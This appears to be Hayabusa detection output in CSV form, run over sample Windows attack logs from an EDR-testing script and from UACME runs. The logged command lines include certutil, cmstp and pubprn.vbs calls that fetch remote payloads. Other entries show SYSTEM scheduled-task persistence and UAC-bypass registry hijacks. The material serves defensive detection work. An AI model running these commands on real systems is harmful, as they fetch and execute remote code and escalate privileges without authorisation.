2019-07-30 06:34:20.238 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd /c certutil.exe -urlcache -split -f https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt Default_File_Path2.ps1 | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 7088 | PGUID: 747F3D96-665C-5D3F-0000-0010096B8D00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:34:20.238 +09:00,MSEDGEWIN10,1,high,Evas | C2,Suspicious Certutil Command,,rules/sigma/process_creation/proc_creation_win_susp_certutil_command.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:34:20.262 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: timeout 5 | Process: C:\Windows\System32\timeout.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 3076 | PGUID: 747F3D96-665C-5D3F-0000-0010DC6B8D00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:34:20.459 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: certutil.exe -urlcache -split -f https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt Default_File_Path2.ps1 | Process: C:\Windows\System32\certutil.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: cmd /c certutil.exe -urlcache -split -f https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt Default_File_Path2.ps1 | LID: 0x413182 | PID: 4520 | PGUID: 747F3D96-665C-5D3F-0000-0010E37B8D00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:34:20.459 +09:00,MSEDGEWIN10,1,high,Evas | C2,Suspicious Certutil Command,,rules/sigma/process_creation/proc_creation_win_susp_certutil_command.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:34:21.867 +09:00,MSEDGEWIN10,3,medium,,Network Connection_Sysmon Alert,Suspicious NetCon | tcp | Src: 10.0.2.15:49832 (MSEDGEWIN10.home) | Dst: 151.101.0.133:443 () | User: MSEDGEWIN10\IEUser | Process: C:\Windows\System32\certutil.exe | PID: 4520 | PGUID: 747F3D96-665C-5D3F-0000-0010E37B8D00,rules/hayabusa/sysmon/alerts/3_NetworkConnection_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:34:21.867 +09:00,MSEDGEWIN10,3,medium,,Network Connection_Sysmon Alert,Suspicious NetCon | tcp | Src: 10.0.2.15:49833 (MSEDGEWIN10.home) | Dst: 151.101.0.133:443 () | User: MSEDGEWIN10\IEUser | Process: C:\Windows\System32\certutil.exe | PID: 4520 | PGUID: 747F3D96-665C-5D3F-0000-0010E37B8D00,rules/hayabusa/sysmon/alerts/3_NetworkConnection_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:34:25.202 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd /c cmstp.exe /ni /s https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Cmstp.inf | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 6428 | PGUID: 747F3D96-6661-5D3F-0000-00107AB88D00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:34:25.269 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: timeout 5 | Process: C:\Windows\System32\timeout.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 5888 | PGUID: 747F3D96-6661-5D3F-0000-00103CBD8D00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:34:25.659 +09:00,MSEDGEWIN10,1,high,PrivEsc | Evas,Bypass UAC via CMSTP,,rules/sigma/process_creation/proc_creation_win_uac_cmstp.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:34:25.659 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: cmstp.exe /ni /s https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Cmstp.inf | Process: C:\Windows\System32\cmstp.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: cmd /c cmstp.exe /ni /s https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Cmstp.inf | LID: 0x413182 | PID: 6820 | PGUID: 747F3D96-6661-5D3F-0000-0010CBC88D00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:34:30.237 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd /c forfiles /p c:\windows\system32 /m notepad.exe /c calc.exe | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 2244 | PGUID: 747F3D96-6666-5D3F-0000-001016F78D00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:34:30.258 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: timeout 5 | Process: C:\Windows\System32\timeout.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 4976 | PGUID: 747F3D96-6666-5D3F-0000-0010C6F88D00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:34:30.685 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: forfiles /p c:\windows\system32 /m notepad.exe /c calc.exe | Process: C:\Windows\System32\forfiles.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: cmd /c forfiles /p c:\windows\system32 /m notepad.exe /c calc.exe | LID: 0x413182 | PID: 1464 | PGUID: 747F3D96-6666-5D3F-0000-0010AE068E00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:34:30.807 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\calc.exe"" | Process: C:\Windows\System32\calc.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: forfiles /p c:\windows\system32 /m notepad.exe /c calc.exe | LID: 0x413182 | PID: 4336 | PGUID: 747F3D96-6666-5D3F-0000-0010DF098E00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:34:30.807 +09:00,MSEDGEWIN10,1,low,Evas,Indirect Command Execution,,rules/sigma/process_creation/proc_creation_win_indirect_cmd.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:34:35.313 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd /c winrm qc -q | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 5840 | PGUID: 747F3D96-666B-5D3F-0000-001051638E00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:34:35.337 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd /c winrm i c wmicimv2/Win32_Process @{CommandLine=""calc""} | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 1580 | PGUID: 747F3D96-666B-5D3F-0000-001033648E00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:34:35.347 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: timeout 5 | Process: C:\Windows\System32\timeout.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 6412 | PGUID: 747F3D96-666B-5D3F-0000-00107C668E00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:34:35.838 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cscript //nologo ""C:\Windows\System32\winrm.vbs"" qc -q | Process: C:\Windows\System32\cscript.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: cmd /c winrm qc -q | LID: 0x413182 | PID: 3224 | PGUID: 747F3D96-666B-5D3F-0000-00102F7F8E00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:34:35.838 +09:00,MSEDGEWIN10,1,medium,Exec,Cscript Visual Basic Script Execution,,rules/sigma/process_creation/proc_creation_win_susp_cscript_vbs.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:34:35.878 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cscript //nologo ""C:\Windows\System32\winrm.vbs"" i c wmicimv2/Win32_Process @{CommandLine=""calc""} | Process: C:\Windows\System32\cscript.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: cmd /c winrm i c wmicimv2/Win32_Process @{CommandLine=""calc""} | LID: 0x413182 | PID: 264 | PGUID: 747F3D96-666B-5D3F-0000-0010EF858E00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:34:35.878 +09:00,MSEDGEWIN10,1,medium,Exec,Cscript Visual Basic Script Execution,,rules/sigma/process_creation/proc_creation_win_susp_cscript_vbs.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:34:36.421 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"Execution - Suspicious Microsoft.XMLDOM module load | Image: C:\Windows\System32\msxml3.dll | Process: C:\Windows\System32\cscript.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 3224 | PGUID: 747F3D96-666B-5D3F-0000-00102F7F8E00 | Hash: SHA1=23805C325D9D4F0A3467F6D2A402A259C376A7F0,MD5=D1B65A6CC7A53A0B68BEE51C639E8F01,SHA256=C948999A3823DA8EBA679F15ABAAEB5E057C91EB716A9DBF9F97FFD09E96CBF7,IMPHASH=2E1D1E35C17BE5497D2DE33F06DC41B4",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:34:36.534 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: calc | Process: C:\Windows\System32\calc.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding | LID: 0x413182 | PID: 3872 | PGUID: 747F3D96-666C-5D3F-0000-00104BB78E00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:34:36.534 +09:00,MSEDGEWIN10,1,high,Exec,Wmiprvse Spawning Process,,rules/sigma/process_creation/proc_creation_win_wmiprvse_spawning_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:34:36.548 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"Execution - Suspicious Microsoft.XMLDOM module load | Image: C:\Windows\System32\msxml3.dll | Process: C:\Windows\System32\cscript.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 264 | PGUID: 747F3D96-666B-5D3F-0000-0010EF858E00 | Hash: SHA1=23805C325D9D4F0A3467F6D2A402A259C376A7F0,MD5=D1B65A6CC7A53A0B68BEE51C639E8F01,SHA256=C948999A3823DA8EBA679F15ABAAEB5E057C91EB716A9DBF9F97FFD09E96CBF7,IMPHASH=2E1D1E35C17BE5497D2DE33F06DC41B4",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:34:40.261 +09:00,MSEDGEWIN10,1,high,Evas,Suspicious Calculator Usage,,rules/sigma/process_creation/proc_creation_win_susp_calc.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:34:40.261 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd /c schtasks /create /tn ""mysc"" /tr C:\windows\system32\calc.exe /sc ONLOGON /ru ""System"" /f | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 2916 | PGUID: 747F3D96-6670-5D3F-0000-001099048F00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:34:40.385 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: timeout 5 | Process: C:\Windows\System32\timeout.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 4720 | PGUID: 747F3D96-6670-5D3F-0000-00105F098F00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:34:40.889 +09:00,MSEDGEWIN10,1,high,,Process Created_Sysmon Alert,"Persistence - Scheduled Task Management | Cmd: schtasks /create /tn ""mysc"" /tr C:\windows\system32\calc.exe /sc ONLOGON /ru ""System"" /f | Process: C:\Windows\System32\schtasks.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: cmd /c schtasks /create /tn ""mysc"" /tr C:\windows\system32\calc.exe /sc ONLOGON /ru ""System"" /f | LID: 0x413182 | PID: 7076 | PGUID: 747F3D96-6670-5D3F-0000-0010F9148F00 | Hash: SHA1=112C8FFA1C0934ACAAD2C58B3C7E81F3FB8E4A2C,MD5=3F9FD6D3B3E96B8F576DB72035DB38A7,SHA256=D6BA2CD73799477C051D9D864C47FCF5108064CDE07D3565871AFA10FC548086,IMPHASH=7EE4BC5589713B3470B8A950256E2E69",rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:34:40.889 +09:00,MSEDGEWIN10,1,high,Evas,Suspicious Calculator Usage,,rules/sigma/process_creation/proc_creation_win_susp_calc.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:34:40.889 +09:00,MSEDGEWIN10,1,low,Exec | Persis | PrivEsc,Scheduled Task Creation,,rules/sigma/process_creation/proc_creation_win_susp_schtask_creation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:34:41.793 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\System32\Tasks\mysc | Process: C:\Windows\system32\svchost.exe | PID: 1028 | PGUID: 747F3D96-DCFE-5D3F-0000-001044D20000,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:34:45.242 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd /c cscript /b C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs 127.0.0.1 script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/test.sct | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 4184 | PGUID: 747F3D96-6675-5D3F-0000-0010AA498F00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:34:45.311 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: timeout 5 | Process: C:\Windows\System32\timeout.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 6192 | PGUID: 747F3D96-6675-5D3F-0000-0010774E8F00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:34:45.606 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: cscript /b C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs 127.0.0.1 script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/test.sct | Process: C:\Windows\System32\cscript.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: cmd /c cscript /b C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs 127.0.0.1 script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/test.sct | LID: 0x413182 | PID: 4036 | PGUID: 747F3D96-6675-5D3F-0000-0010875C8F00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:34:45.606 +09:00,MSEDGEWIN10,1,medium,Exec,Cscript Visual Basic Script Execution,,rules/sigma/process_creation/proc_creation_win_susp_cscript_vbs.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-08-03 18:46:48.209 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: UACME.exe 34 | Process: C:\Users\IEUser\Desktop\UACME.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x18d3fb | PID: 924 | PGUID: 747F3D96-5808-5D45-0000-00106CDC3E00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_34.evtx
2019-08-03 18:46:48.209 +09:00,MSEDGEWIN10,1,high,Evas | PrivEsc,UAC Bypass Tool UACMe,,rules/sigma/process_creation/proc_creation_win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_34.evtx
2019-08-03 18:46:48.209 +09:00,MSEDGEWIN10,1,low,Exec,Process Start From Suspicious Folder,,rules/sigma/process_creation/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_34.evtx
2019-08-03 18:46:48.726 +09:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,"PrivEsc - UAC bypass UACME-34 | SetValue: HKU\S-1-5-21-3461203602-4096304019-2269080069-1000\Environment\windir: ""C:\Windows\system32\cmd.exe"" | Process: C:\Windows\explorer.exe | PID: 924 | PGUID: 747F3D96-5808-5D45-0000-00106CDC3E00",rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_34.evtx
2019-08-03 18:46:48.924 +09:00,MSEDGEWIN10,1,high,,Process Created_Sysmon Alert,"Persistence - Scheduled Task Management | Cmd: ""C:\Windows\System32\schtasks.exe"" /run /tn ""\Microsoft\Windows\DiskCleanup\SilentCleanup"" /i | Process: C:\Windows\System32\schtasks.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: UACME.exe 34 | LID: 0x18d3fb | PID: 1268 | PGUID: 747F3D96-5808-5D45-0000-0010D1FE3E00 | Hash: SHA1=112C8FFA1C0934ACAAD2C58B3C7E81F3FB8E4A2C,MD5=3F9FD6D3B3E96B8F576DB72035DB38A7,SHA256=D6BA2CD73799477C051D9D864C47FCF5108064CDE07D3565871AFA10FC548086,IMPHASH=7EE4BC5589713B3470B8A950256E2E69",rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_34.evtx
2019-08-03 18:46:49.402 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe""\system32\cleanmgr.exe /autoclean /d C: | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule | LID: 0x18d3b3 | PID: 1380 | PGUID: 747F3D96-5809-5D45-0000-00100B233F00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_34.evtx
2019-08-03 18:46:49.402 +09:00,MSEDGEWIN10,1,high,Evas | PrivEsc,UAC Bypass Using Disk Cleanup,,rules/sigma/process_creation/proc_creation_win_uac_bypass_cleanmgr.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_34.evtx
2019-08-03 18:46:49.436 +09:00,MSEDGEWIN10,12,medium,,Registry Key Create/Delete_Sysmon Alert,PrivEsc - UAC bypass UACME-34 | DeleteValue: HKU\S-1-5-21-3461203602-4096304019-2269080069-1000\Environment\windir | Process: C:\Windows\explorer.exe | PID: 924 | PGUID: 747F3D96-5808-5D45-0000-00106CDC3E00,rules/hayabusa/sysmon/alerts/12_RegistryKeyCreateDelete_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_34.evtx
2019-08-03 18:46:49.502 +09:00,MSEDGEWIN10,5,info,,Process Terminated,Process: C:\Users\IEUser\Desktop\UACME.exe | PID: 924 | PGUID: 747F3D96-5808-5D45-0000-00106CDC3E00,rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_34.evtx
2019-08-03 19:14:02.589 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: UACME.exe 33 | Process: C:\Users\IEUser\Desktop\UACME.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x18d3fb | PID: 4440 | PGUID: 747F3D96-5E6A-5D45-0000-001076639D00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_33.evtx
2019-08-03 19:14:02.589 +09:00,MSEDGEWIN10,1,high,Evas | PrivEsc,UAC Bypass Tool UACMe,,rules/sigma/process_creation/proc_creation_win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_33.evtx
2019-08-03 19:14:02.589 +09:00,MSEDGEWIN10,1,low,Exec,Process Start From Suspicious Folder,,rules/sigma/process_creation/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_33.evtx
2019-08-03 19:14:02.929 +09:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,PrivEsc - UAC bypass UACME-33 | SetValue: HKU\S-1-5-21-3461203602-4096304019-2269080069-1000_Classes\ms-settings\shell\open\command\DelegateExecute: (Empty) | Process: C:\Windows\explorer.exe | PID: 4440 | PGUID: 747F3D96-5E6A-5D45-0000-001076639D00,rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_33.evtx
2019-08-03 19:14:02.929 +09:00,MSEDGEWIN10,13,high,PrivEsc | Evas,Bypass UAC Using DelegateExecute,,rules/sigma/registry_event/win_re_bypass_uac_using_delegateexecute.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_33.evtx
2019-08-03 19:14:02.929 +09:00,MSEDGEWIN10,13,high,Evas | PrivEsc,Shell Open Registry Keys Manipulation,,rules/sigma/registry_event/win_registry_shell_open_keys_manipulation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_33.evtx
2019-08-03 19:14:02.934 +09:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,PrivEsc - UAC bypass UACME-33 | SetValue: HKU\S-1-5-21-3461203602-4096304019-2269080069-1000_Classes\ms-settings\shell\open\command\(Default): C:\Windows\system32\cmd.exe | Process: C:\Windows\explorer.exe | PID: 4440 | PGUID: 747F3D96-5E6A-5D45-0000-001076639D00,rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_33.evtx
2019-08-03 19:14:02.934 +09:00,MSEDGEWIN10,13,high,Evas | PrivEsc,Shell Open Registry Keys Manipulation,,rules/sigma/registry_event/win_registry_shell_open_keys_manipulation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_33.evtx
2019-08-03 19:14:07.652 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\fodhelper.exe"" | Process: C:\Windows\System32\fodhelper.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: UACME.exe 33 | LID: 0x18d3fb | PID: 4208 | PGUID: 747F3D96-5E6F-5D45-0000-00108F969D00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_33.evtx
